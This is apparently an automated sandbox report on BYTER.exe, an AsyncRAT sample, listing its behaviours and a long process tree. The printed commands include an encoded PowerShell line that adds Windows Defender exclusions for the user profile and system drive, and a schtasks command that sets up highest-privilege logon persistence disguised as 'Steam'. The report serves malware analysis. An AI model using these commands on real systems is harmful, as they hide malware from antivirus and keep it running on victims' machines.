Analysis Overview
SHA256
ceb87fb8fc18a0699bac5b532cfdad64cfdf755efccb03b2571679460b465724
Threat Level: Known bad
The file BYTER.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Enumerates physical storage devices
Command and Scripting Interpreter: PowerShell
Unsigned PE
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-03 07:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 07:20
Reported
2024-06-03 07:23
Platform
win10v2004-20240508-en
Max time kernel
6s
Max time network
96s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\BYTER.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MAIN.exe | N/A |
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat""
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Windows\system32\timeout.exe
timeout 3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Users\Admin\AppData\Roaming\Steam.exe
"C:\Users\Admin\AppData\Roaming\Steam.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\BYTER.exe
"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"
C:\Users\Admin\AppData\Local\Temp\MAIN.exe
"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
